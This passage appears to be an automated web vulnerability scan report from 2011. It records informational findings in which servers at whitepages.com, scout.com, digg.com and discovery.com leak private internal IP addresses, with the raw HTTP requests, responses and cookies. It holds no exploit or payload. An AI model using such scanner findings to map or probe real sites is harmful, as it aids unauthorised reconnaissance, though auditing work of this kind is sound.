GET /IMPCNT/ccid=58284/AAMSZ=bottom_rail/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS HTTP/1.1
Host: atl.whitepages.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; GUID=00058525BF050D44401A5E1461626364; LE1=+6jd3r4Ya10014+4; LE2=+6jd3raZf10014+4; LE3=+6jd3r4Wa10014+4; LE4=+6jd3rKba10014+4; AA002=1294100002-3786607

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:29:45 GMT
X-DirectServer: whitepg_DS0
Content-Type: image/gif
Content-Length: 43
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

GIF89a.............!.......,...........D..;

27.6. http://atl.whitepages.com/IMPCNT/ccid=60680/AAMSZ=med_rect/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://atl.whitepages.com
Path:	/IMPCNT/ccid=60680/AAMSZ=med_rect/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.3.8.1

Request

GET /IMPCNT/ccid=60680/AAMSZ=med_rect/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS HTTP/1.1
Host: atl.whitepages.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; GUID=00058525BF050D44401A5E1461626364; LE1=+6jd3r4Ya10014+4; LE2=+6jd3raZf10014+4; LE3=+6jd3r4Wa10014+4; LE4=+6jd3rKba10014+4; AA002=1294100002-3786607

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:29:43 GMT
X-DirectServer: whitepg_DS3
Content-Type: image/gif
Content-Length: 43
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

GIF89a.............!.......,...........D..;

Summary

Severity:	Information
Confidence:	Certain
Host:	http://atl.whitepages.com
Path:	/LSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.3.8.1

Request

Response

27.8. http://atl.whitepages.com/accipiter/adclick/CID=0000e5bbb2c762f700000000/AAMSZ=endemic_module/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://atl.whitepages.com
Path:	/accipiter/adclick/CID=0000e5bbb2c762f700000000/AAMSZ=endemic_module/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.3.8.1

Request

GET /accipiter/adclick/CID=0000e5bbb2c762f700000000/AAMSZ=endemic_module/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/ HTTP/1.1
Host: atl.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; GUID=00058525BF050D44401A5E1461626364; Sample=18; wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; LE2=+6jd3raZf10014+4; __qca=P0-1307497695-1296350983104; LE1=+6jd3r4Ya10014+4; LE4=+6jd3rKba10014+4; LE3=+6jd3r4Wa10014+4;

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 02:05:49 GMT
X-DirectServer: whitepg_DS1
Content-Type: text/html
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: http://www.peoplefinders.com/redirect.aspx?

27.9. http://atl.whitepages.com/accipiter/adclick/CID=fffffffcfffffffcfffffffc/AAMSZ=custom_panel/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://atl.whitepages.com
Path:	/accipiter/adclick/CID=fffffffcfffffffcfffffffc/AAMSZ=custom_panel/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.3.8.1

Request

GET /accipiter/adclick/CID=fffffffcfffffffcfffffffc/AAMSZ=custom_panel/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/ HTTP/1.1
Host: atl.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; GUID=00058525BF050D44401A5E1461626364; Sample=18; wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; LE2=+6jd3raZf10014+4; __qca=P0-1307497695-1296350983104; LE1=+6jd3r4Ya10014+4; LE4=+6jd3rKba10014+4; LE3=+6jd3r4Wa10014+4;

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 02:05:48 GMT
X-DirectServer: whitepg_DS0
Content-Type: text/html
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: www.whitepagesinc.com

27.10. http://atl.whitepages.com/accipiter/adclick/CID=fffffffcfffffffcfffffffc/AAMSZ=teaser_link/ATCI=1294100002-3786607/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://atl.whitepages.com
Path:	/accipiter/adclick/CID=fffffffcfffffffcfffffffc/AAMSZ=teaser_link/ATCI=1294100002-3786607/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.3.8.1

Request

GET /accipiter/adclick/CID=fffffffcfffffffcfffffffc/AAMSZ=teaser_link/ATCI=1294100002-3786607/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/ HTTP/1.1
Host: atl.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; GUID=00058525BF050D44401A5E1461626364; Sample=18; wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; LE2=+6jd3raZf10014+4; __qca=P0-1307497695-1296350983104; LE1=+6jd3r4Ya10014+4; LE4=+6jd3rKba10014+4; LE3=+6jd3r4Wa10014+4;

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 02:05:48 GMT
X-DirectServer: whitepg_DS2
Content-Type: text/html
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: www.whitepagesinc.com

27.11. http://atl.whitepages.com/adclick/CID=0000e376b2c762f700000000/relocate=/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://atl.whitepages.com
Path:	/adclick/CID=0000e376b2c762f700000000/relocate=/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.3.8.1

Request

GET /adclick/CID=0000e376b2c762f700000000/relocate=/ HTTP/1.1
Host: atl.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; GUID=00058525BF050D44401A5E1461626364; Sample=18; wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; LE2=+6jd3raZf10014+4; __qca=P0-1307497695-1296350983104; LE1=+6jd3r4Ya10014+4; LE4=+6jd3rKba10014+4; LE3=+6jd3r4Wa10014+4;

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 02:05:40 GMT
X-DirectServer: whitepg_DS5
Content-Type: text/html
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: /

27.12. http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate= previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://atl.whitepages.com
Path:	/adclick/CID=0000ed08b2c762f700000000/relocate=

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.3.8.1

Request

GET /adclick/CID=0000ed08b2c762f700000000/relocate= HTTP/1.1
Host: atl.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; GUID=00058525BF050D44401A5E1461626364; Sample=18; wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; LE2=+6jd3raZf10014+4; __qca=P0-1307497695-1296350983104; LE1=+6jd3r4Ya10014+4; LE4=+6jd3rKba10014+4; LE3=+6jd3r4Wa10014+4;

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 02:05:47 GMT
X-DirectServer: whitepg_DS3
Content-Type: text/html
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: www.whitepagesinc.com

27.13. http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://atl.whitepages.com
Path:	/adclick/CID=0000ed08b2c762f700000000/relocate=/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.3.8.1

Request

GET /adclick/CID=0000ed08b2c762f700000000/relocate=/ HTTP/1.1
Host: atl.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; GUID=00058525BF050D44401A5E1461626364; Sample=18; wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; LE2=+6jd3raZf10014+4; __qca=P0-1307497695-1296350983104; LE1=+6jd3r4Ya10014+4; LE4=+6jd3rKba10014+4; LE3=+6jd3r4Wa10014+4;

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 02:05:43 GMT
X-DirectServer: whitepg_DS0
Content-Type: text/html
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: /

Summary

Severity:	Information
Confidence:	Certain
Host:	http://atl.whitepages.com
Path:	/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.3.8.1

Request

GET /bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link HTTP/1.1
Host: atl.whitepages.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:29:40 GMT
X-DirectServer: whitepg_DS5
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: /LSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

27.15. http://college.scout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://college.scout.com
Path:	/

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.10.106
192.168.20.210

Request

GET / HTTP/1.1
Host: college.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:07:54 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:17:54 GMT
Last-Modified: Sat, 29 Jan 2011 23:57:33 GMT
ETag: "1CBC0104B911480"
Content-Type: text/html
Content-Length: 69563

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>College Team Directory Front Page</title>
<meta http
...[SNIP]...

...[SNIP]...

...[SNIP]...

27.16. http://collegebasketball.scout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://collegebasketball.scout.com
Path:	/

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.10.106
192.168.20.210

Request

GET / HTTP/1.1
Host: collegebasketball.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:07:54 GMT
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:17:54 GMT
Last-Modified: Sun, 30 Jan 2011 02:06:12 GMT
ETag: "1CBC02244730200"
Content-Type: text/html
Content-Length: 43257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Sc
...[SNIP]...

...[SNIP]...

...[SNIP]...

27.17. http://collegefootball.scout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://collegefootball.scout.com
Path:	/

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.10.106
192.168.20.210

Request

GET / HTTP/1.1
Host: collegefootball.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:07:55 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:17:55 GMT
Last-Modified: Sun, 30 Jan 2011 02:05:21 GMT
ETag: "1CBC022260D0680"
Content-Type: text/html
Content-Length: 43460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Sc
...[SNIP]...

...[SNIP]...

...[SNIP]...

27.18. http://content.scout.com/a.z previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://content.scout.com
Path:	/a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.10.106
192.168.20.210

Request

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 30 Jan 2011 02:07:57 GMT
Server: Microsoft-IIS/6.0
Server: Summit
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:17:57 GMT
Content-Type: text/html
Content-Length: 11945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Sc
...[SNIP]...

...[SNIP]...

...[SNIP]...

27.19. http://digg.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/search

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.2.129.226

Request

GET /search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:12:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=32580 10.2.129.226
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7917

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Search
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, po
...[SNIP]...
<span title="10.2.129.226 Build: 196 - Wed Jan 26 14:41:03 PST 2011">
...[SNIP]...

27.20. http://digg.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/search

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.2.129.80

Request

GET /search?s=msnbc.redacted HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:52:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=26240 10.2.129.80
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1

27.21. http://digg.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/search

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.2.128.190

Request

GET /search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.22. http://digg.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/search

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.2.129.90

Request

GET /search?s=msnbc.redacted HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=30639 10.2.129.90
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1

27.23. http://jcfootball.scout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jcfootball.scout.com
Path:	/

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.10.106
192.168.20.210

Request

GET / HTTP/1.1
Host: jcfootball.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:09:07 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:19:07 GMT
Last-Modified: Sat, 29 Jan 2011 23:52:25 GMT
ETag: "1CBC00F93FC0280"
Content-Type: text/html
Content-Length: 41053

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>JC Football Recruiting Front Page</title>
<meta http
...[SNIP]...

...[SNIP]...

...[SNIP]...

27.24. http://mlb.scout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mlb.scout.com
Path:	/

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.10.106
192.168.20.210

Request

GET / HTTP/1.1
Host: mlb.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:09:36 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:19:36 GMT
Last-Modified: Sat, 29 Jan 2011 23:57:57 GMT
ETag: "1CBC01059DF3080"
Content-Type: text/html
Content-Length: 27801

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>MLB Team Directory Front Page</title>
<meta http-equiv="Con
...[SNIP]...

...[SNIP]...

...[SNIP]...

27.25. http://msn.whitepages.com/static/common/endemic.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.whitepages.com
Path:	/static/common/endemic.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.0.1

Request

GET /static/common/endemic.js HTTP/1.1
Host: msn.whitepages.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:29:41 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.30
Last-Modified: Tue, 25 Jan 2011 01:51:37 GMT
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 15490

// whitepages.survey namespace
if (typeof(whitepages.publicSearch) == 'undefined') { whitepages.publicSearch = function() {}; }
if (typeof(whitepages.publicSearch.mapper) == 'undefined') { whitepage
...[SNIP]...
<ipAddress>192.168.0.1</ipAddress>
...[SNIP]...

27.26. http://news.discovery.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://news.discovery.com
Path:	/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.32.152

Request

GET / HTTP/1.1
Host: news.discovery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix)
Content-Length: 62518
Content-Type: text/html; charset=UTF-8
X-ServerId: 192.168.32.152
Content-Language: en
Cache-Control: max-age=841
Date: Sun, 30 Jan 2011 18:06:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">

<html
xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en"
>

<head>
<meta http-equiv
...[SNIP]...

27.27. http://news.discovery.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://news.discovery.com
Path:	/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.32.151

Request

GET / HTTP/1.1
Host: news.discovery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.28. http://preps.scout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://preps.scout.com
Path:	/

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.10.106
192.168.20.210

Request

GET / HTTP/1.1
Host: preps.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:17:49 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:27:49 GMT
Last-Modified: Sat, 29 Jan 2011 23:57:33 GMT
ETag: "1CBC0104B911480"
